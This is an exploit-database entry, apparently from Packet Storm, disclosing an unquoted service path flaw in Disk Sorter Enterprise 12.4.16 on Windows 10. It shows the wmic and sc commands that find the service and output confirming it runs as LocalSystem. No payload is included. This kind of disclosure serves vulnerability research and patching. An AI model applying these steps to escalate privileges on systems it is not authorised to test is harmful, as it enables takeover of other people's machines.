Share
## https://sploitus.com/exploit?id=PACKETSTORM:156284
Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path 
Exploit Author: boku 
Date: 2020-02-10 
Vendor Homepage: http://www.disksorter.com 
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe 
Version: 12.4.16 
Tested On: Windows 10 (32-bit) 
 
 
C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """ 
Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto 
 
C:\Users\terran>sc qc "Disk Sorter Enterprise" 
[SC] QueryServiceConfig SUCCESS 
 
SERVICE_NAME: Disk Sorter Enterprise 
TYPE : 10 WIN32_OWN_PROCESS 
START_TYPE : 2 AUTO_START 
ERROR_CONTROL : 0 IGNORE 
BINARY_PATH_NAME : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe 
LOAD_ORDER_GROUP : 
TAG : 0 
DISPLAY_NAME : Disk Sorter Enterprise 
DEPENDENCIES : 
SERVICE_START_NAME : LocalSystem